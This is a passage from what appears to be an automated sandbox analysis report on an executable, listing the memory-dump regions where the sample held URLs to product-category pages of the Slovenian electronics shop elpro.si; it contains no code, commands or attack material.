00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijske-tablice/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-telefoni
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/fiksni-infrardeci-ir-merilniki-tempe
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/kalibracijska-oprema-crno-telo-black
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/merilni-sistemi-za-temperaturo-calex
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-in-regulatorji-calex/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-za-fiksne-infrardece-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/rocni-infrardeci-ir-merilniki-temper
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/izolirane-zice-termoparov/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-prikljucni-za-uporovna-tipala
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-termoclenov-za-termoelemente-
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/konektorji-za-prikljucitev-temperat
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 